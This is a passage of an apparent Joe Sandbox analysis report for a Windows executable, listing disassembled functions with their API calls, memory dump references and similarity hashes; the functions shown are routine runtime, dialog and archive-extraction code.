    • SetLastError.KERNEL32(00000000,?,00CD3070,00000200), ref: 00CBA571
    • SetLastError.KERNEL32(00000000,?,00CD3070,00000200), ref: 00CBA57D
    • _abort.LIBCMT ref: 00CBA583
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: b5d94b07b6eb03df316b32875c3bc5dbd007366860212f8f481a9d05abf36167
    • Instruction ID: 8cdcaff7acf6594fc1e3650f347eb9c4aa61fb1dc523e73b26ee14d990d024fe
    • Opcode Fuzzy Hash: b5d94b07b6eb03df316b32875c3bc5dbd007366860212f8f481a9d05abf36167
    • Instruction Fuzzy Hash: D7F0FC31540E0167C2257379BC4AFEF2BA99FD1721F250025F6A5E2192EE218F06A527
    Function 00CAED7B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
    Download Yara Rule
    APIs
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CAED87
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CAEDA1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CAEDB2
    • TranslateMessage.USER32(?), ref: 00CAEDBC
    • DispatchMessageW.USER32(?), ref: 00CAEDC6
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CAEDD1
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
    • String ID:
    • API String ID: 2148572870-0
    • Opcode ID: 859c3ccf1a0f42ba4a19b8f7ad0512c33ffb7a077b09364208b66ae012d27d8d
    • Instruction ID: 54970dd777e8ba636190cfbb4b3dad2270d93526d73963214399a3768ff31324
    • Opcode Fuzzy Hash: 859c3ccf1a0f42ba4a19b8f7ad0512c33ffb7a077b09364208b66ae012d27d8d
    • Instruction Fuzzy Hash: B3F0E772A0161ABBCB206BA5EC4CFDF7F6DEF42795B108021F71AD2051DA349645CBE1
    Function 00C9D4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00CA1900: _wcslen.LIBCMT ref: 00CA1906
      • Part of subcall function 00C9CD5C: _wcsrchr.LIBVCRUNTIME ref: 00C9CD73
    • _wcslen.LIBCMT ref: 00C9D5A4
    • _wcslen.LIBCMT ref: 00C9D5EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$_wcsrchr
    • String ID: .exe$.rar$.sfx
    • API String ID: 3513545583-31770016
    • Opcode ID: b34952f0a71d6b0b83f64a3c196b4aaef9b05df8ca0cd4519ba4cd72417a9ab6
    • Instruction ID: c4906976ec01e1edda604088d0d52276b801f8c1aa2bc9ff7500c6352157b44d
    • Opcode Fuzzy Hash: b34952f0a71d6b0b83f64a3c196b4aaef9b05df8ca0cd4519ba4cd72417a9ab6
    • Instruction Fuzzy Hash: 744159A290036199CF35BF74C859A3BB3A8EF5174CF16490EF8A7BB081E7608E81D351
    Function 00CADFBA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
    Download Yara Rule
    APIs
    • GetTempPathW.KERNEL32(00000800,?), ref: 00CADFD0
      • Part of subcall function 00C9CAA0: _wcslen.LIBCMT ref: 00C9CAA6
    • _swprintf.LIBCMT ref: 00CAE004
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • SetDlgItemTextW.USER32(?,00000066,00CE2892), ref: 00CAE024
    • EndDialog.USER32(?,00000001), ref: 00CAE131
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
    • String ID: %s%s%u
    • API String ID: 110358324-1360425832
    • Opcode ID: 6e0f4f3913186fe30d39cd0159bebe9ab1ef64af4b6495fe4f930c31b14a9d14
    • Instruction ID: 0a60ba013815a505f7556ffbcdecf093d1e256d90845410e5fa25437e4ba27d8
    • Opcode Fuzzy Hash: 6e0f4f3913186fe30d39cd0159bebe9ab1ef64af4b6495fe4f930c31b14a9d14
    • Instruction Fuzzy Hash: C8413471900259AADF25DB60DC45FEE77FCEB06308F4480A6F90AA7051EF719A44DFA1
    Function 00C9CF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00C9CF56
    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00C9B505,?,?,00000800,?,?,00C9B4CA,?), ref: 00C9CFF4
    • _wcslen.LIBCMT ref: 00C9D06A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$CurrentDirectory
    • String ID: UNC$\\?\
    • API String ID: 3341907918-253988292
    • Opcode ID: f601f59fd72e2dc4ea48f494dd91f1296bdaf6b15b8e70927bca60881b4df92f
    • Instruction ID: e6a95a089f2fb5afc7de295dd1697506932a7b796416978ccaf3043a3307ea28
    • Opcode Fuzzy Hash: f601f59fd72e2dc4ea48f494dd91f1296bdaf6b15b8e70927bca60881b4df92f
    • Instruction Fuzzy Hash: C341E732444225BACF20AFB0CC49EEF77A9AF45391F144426F866B3141E774DA42D751
    Function 00CAC8BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
    Download Yara Rule
    APIs
    • LoadBitmapW.USER32(00000065), ref: 00CAC8CD
    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CAC8F2
    • DeleteObject.GDI32(00000000), ref: 00CAC924
    • DeleteObject.GDI32(00000000), ref: 00CAC947
      • Part of subcall function 00CAB6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6D5
      • Part of subcall function 00CAB6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB6EC
      • Part of subcall function 00CAB6C2: LoadResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB703
      • Part of subcall function 00CAB6C2: LockResource.KERNEL32(00000000,?,?,?,00CAC91D,00000066), ref: 00CAB712
      • Part of subcall function 00CAB6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00CAC91D,00000066), ref: 00CAB72D
      • Part of subcall function 00CAB6C2: GlobalLock.KERNEL32(00000000), ref: 00CAB73E
      • Part of subcall function 00CAB6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CAB762
      • Part of subcall function 00CAB6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CAB7A7
      • Part of subcall function 00CAB6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CAB7C6
      • Part of subcall function 00CAB6C2: GlobalFree.KERNEL32(00000000), ref: 00CAB7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
    • String ID: ]
    • API String ID: 1797374341-3352871620
    • Opcode ID: d5689392243c469efe476260e15373910088e0f6902a03dcbf214ee016cf2a43
    • Instruction ID: 363bebcb75755cd40600af27f0531ddcbb9bddf3f14739ca6a1d52d787177999
    • Opcode Fuzzy Hash: d5689392243c469efe476260e15373910088e0f6902a03dcbf214ee016cf2a43
    • Instruction Fuzzy Hash: BA01F53290060767D71177749C49F7F3A7AAF83B69F150010FA10B72D2DF318D0596A1
    Function 00CAE740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CAE78B
    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00CAE7A1
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CAE7B5
    • SetDlgItemTextW.USER32(?,00000068), ref: 00CAE7C4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: RENAMEDLG
    • API String ID: 364370097-3299779563
    • Opcode ID: 2a29aa0f1dc9a92e393d2e1a880a3b8ff59489bed2bba106b12737ed866a63ae
    • Instruction ID: 675efd349373357b53999e8e1d0339905e2e7e864bd1580a4dbac0110d8183fd
    • Opcode Fuzzy Hash: 2a29aa0f1dc9a92e393d2e1a880a3b8ff59489bed2bba106b12737ed866a63ae
    • Instruction Fuzzy Hash: 1601FC32680715BBE2118B759C4DFBF3B6DFB5BB06F144415F301E60D0C6626905C7A6
    Function 00CB9225 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CB91D6,00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002), ref: 00CB9245
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CB9258
    • FreeLibrary.KERNEL32(00000000,?,?,?,00CB91D6,00000000,?,00CB9176,00000000,00CCD570,0000000C,00CB92CD,00000000,00000002), ref: 00CB927B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 090d788f10a3f0098e3d134751482fda1dd835c25fff719b8afc0d188d3679f2
    • Instruction ID: d412ef8844d4b99aac9be4cf5e683df23cce6061946809f5d502397ff4331859
    • Opcode Fuzzy Hash: 090d788f10a3f0098e3d134751482fda1dd835c25fff719b8afc0d188d3679f2
    • Instruction Fuzzy Hash: 03F06230A40208BBDF159FB4DC59FEEBFB4EF04711F018169F905A21A0CB345E40CA91
    Function 00CA0620 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00CA1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
      • Part of subcall function 00CA1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA063F
    • GetProcAddress.KERNEL32(00CDA1F0,CryptUnprotectMemory), ref: 00CA064F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressProc$DirectoryLibraryLoadSystem
    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
    • API String ID: 2141747552-1753850145
    • Opcode ID: 62ba7d02e6bc3929f8fae2f096f48c74defe70d26ec7783671430944891f51fb
    • Instruction ID: f4c07f6dd8c4e498a0b143b1a1939c6a5079c13cd153459fb39a6d55700e0928
    • Opcode Fuzzy Hash: 62ba7d02e6bc3929f8fae2f096f48c74defe70d26ec7783671430944891f51fb
    • Instruction Fuzzy Hash: 8CE04F70845B825FD7245F74E828F467FE45B25719F14C82DF69593551D6B4E8408B10
    Function 00CB3D5A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AdjustPointer$_abort
    • String ID:
    • API String ID: 2252061734-0
    • Opcode ID: a55305ba9c944b2dcc39bad1c1e045de9003408b5648b903a005a10aadf9b812
    • Instruction ID: f0a454ec05b08db49e6d98cb1d3d57e9e7e804133875a0c613d3587686a7304f
    • Opcode Fuzzy Hash: a55305ba9c944b2dcc39bad1c1e045de9003408b5648b903a005a10aadf9b812
    • Instruction Fuzzy Hash: 0651F771A046C6AFDB299F64D845BFAB7A4EF40310F14452EEC16872A1E731EF80DB90
    Function 00CBD0E0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
    Download Yara Rule
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 00CBD0E9
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBD10C
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CBD132
    • _free.LIBCMT ref: 00CBD145
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBD154
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
    • String ID:
    • API String ID: 336800556-0
    • Opcode ID: f61db97311bc6587d3a22abea7e284c9a0d3620f04590872aacfe35f0aeb7a5b
    • Instruction ID: 2426db681cc3625763713d1e49e2e5641f6e4ff16437b8e3fdccfa294ed730ef
    • Opcode Fuzzy Hash: f61db97311bc6587d3a22abea7e284c9a0d3620f04590872aacfe35f0aeb7a5b
    • Instruction Fuzzy Hash: AD01AC726012157F372116BBAC4CDBF6A6DDEC2BB1B180119F906D7200FE608D419970
    Function 00CBA589 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00CD3070,00000200,00CBA7E0,00CB7586,?,?,?,?,00C9ECA4,?,02FC33A8,00000064,00000004,00C9EA30,?), ref: 00CBA58E
    • _free.LIBCMT ref: 00CBA5C3
    • _free.LIBCMT ref: 00CBA5EA
    • SetLastError.KERNEL32(00000000,00CC4ADC,00000050,00CD3070), ref: 00CBA5F7
    • SetLastError.KERNEL32(00000000,00CC4ADC,00000050,00CD3070), ref: 00CBA600
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: 9508fdaa69d40c01f5def5f779705f09289c65810a8ad8aabe8b78dcfc0d9529
    • Instruction ID: b3927dd86589acd90e1ba02158999675544ca0f8755caa86affbbb97da18d0d2
    • Opcode Fuzzy Hash: 9508fdaa69d40c01f5def5f779705f09289c65810a8ad8aabe8b78dcfc0d9529
    • Instruction Fuzzy Hash: 69014472280A016787262735AD89FEF276E9BC0371F22002AF994D2141FE308F4A6022
    Function 00CBD9AF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 00CBD9C7
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBD9D9
    • _free.LIBCMT ref: 00CBD9EB
    • _free.LIBCMT ref: 00CBD9FD
    • _free.LIBCMT ref: 00CBDA0F
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: bc0f8b2db8bf19b9097a92a3cddcf6852654a65647d6b3e74651e26f27ae8fc5
    • Instruction ID: cfa991adaa96a79dd5ad4bc77f238aeacf845829a85e27c4cc0dc1119539cf0d
    • Opcode Fuzzy Hash: bc0f8b2db8bf19b9097a92a3cddcf6852654a65647d6b3e74651e26f27ae8fc5
    • Instruction Fuzzy Hash: F8F0FF72505204AB8620EB68E5C6E9E77E9BB05711F680C07F09DE7901DB70FD809665
    Function 00CA3328 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00CA3330
    • _wcslen.LIBCMT ref: 00CA3341
    • _wcslen.LIBCMT ref: 00CA3351
    • _wcslen.LIBCMT ref: 00CA335F
    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00C9C844,?,?,00000000,?,?,?), ref: 00CA337A
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
